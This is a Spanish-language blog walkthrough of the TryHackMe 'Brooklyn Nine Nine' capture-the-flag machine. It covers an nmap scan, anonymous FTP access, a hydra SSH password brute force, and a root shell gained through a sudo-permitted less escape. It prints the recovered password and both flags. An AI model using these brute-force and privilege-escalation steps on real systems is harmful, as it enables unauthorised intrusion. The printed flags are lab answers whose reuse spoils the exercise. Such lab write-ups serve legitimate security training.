LaCashita!

[TryHackMe] Brooklyn Nine Nine

Hoy vamos a hackear la maquina de TryHackMe llamada Broklyn Nine Nine. Podeis descargarla desde el siguiente enlace: Brooklyn Nine Nine

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.


~ > nmap -A 10.10.60.217
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 08:13 CEST
Nmap scan report for 10.10.60.217
Host is up (0.057s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.24.208
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

Nmap nos muestra que nos podemos conectar con el usuario anonymous al ftp. Nos conectamos al ftp para ver si vemos algo interesante.


~ > ftp 10.10.60.217
Connected to 10.10.60.217.
220 (vsFTPd 3.0.3)
Name (10.10.60.217:sml): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17 23:17 note_to_jake.txt
226 Directory send OK.

Vemos el fichero note_to_jake.txt, lo descargamos.


ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.11 secs (1.0441 kB/s)
ftp> exit
221 Goodbye.

Miramos el contenido del fichero.


~ > cat note_to_jake.txt                                                      
      12s
From Amy,
Jake please change your password. It is too weak and holt will be mad if 
someone hacks into the nine nine

Podemos ver que Amy le dice a Jake que cambie su password ya que es debil. Teniendo esta informacion, utilizamos hydra para hacer bruteforce de la password de jake por ssh.


~ > hydra -l jake -P rockyou.txt 10.10.60.217 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret 
service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 
08:14:35
[WARNING] Many SSH configurations limit the number of parallel tasks, it is 
recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip 
waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries 
(l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.60.217:22/
[22][ssh] host: 10.10.60.217   login: jake   password: 987654321

Obtenemos la password! Utilizamos los credenciales de jake para conectarnos por ssh...

Low Shell

Nos logueamos como jake.


~ > ssh jake@10.10.60.217
jake@10.10.60.217's password: 
Last login: Tue May 26 08:56:58 2020

user.txt

Exploramos el sistema para buscar la flag de user.


jake@brookly_nine_nine:/home$ cd /home
jake@brookly_nine_nine:/home$ ls
amy  holt  jake
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ ls -la
total 48
drwxr-xr-x 6 holt holt 4096 May 26 09:01 .
drwxr-xr-x 5 root root 4096 May 18 10:21 ..
-rw------- 1 holt holt   18 May 26 09:01 .bash_history
-rw-r--r-- 1 holt holt  220 May 17 21:42 .bash_logout
-rw-r--r-- 1 holt holt 3771 May 17 21:42 .bashrc
drwx------ 2 holt holt 4096 May 18 10:24 .cache
drwx------ 3 holt holt 4096 May 18 10:24 .gnupg
drwxrwxr-x 3 holt holt 4096 May 17 21:46 .local
-rw-r--r-- 1 holt holt  807 May 17 21:42 .profile
drwx------ 2 holt holt 4096 May 18 14:45 .ssh
-rw------- 1 root root  110 May 18 17:12 nano.save
-rw-rw-r-- 1 holt holt   33 May 17 21:49 user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee

Miramos si podemos hacer algo con sudo.


jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/
snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less

Privilege Escalation

Vemos que podemos utilizar less, el cual nos puede permitir obtener una shell con privilegios. Para ello ejecutamos:


jake@brookly_nine_nine:~$ sudo /usr/bin/less /etc/shadow

Una vez se nos este mostrando el fichero escribimos:


!/bin/bash

Y ya tendriamos una shell de root


root@brookly_nine_nine:~# id
uid=0(root) gid=0(root) groups=0(root)

root.txt


root@brookly_nine_nine:/root# cat /root/root.txt 
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: 63a9f0ea7bb98050796b649e85481845

Enjoy!!
root@brookly_nine_nine:/root#

End

Con esto, ya habriamos finalizado la maquina :)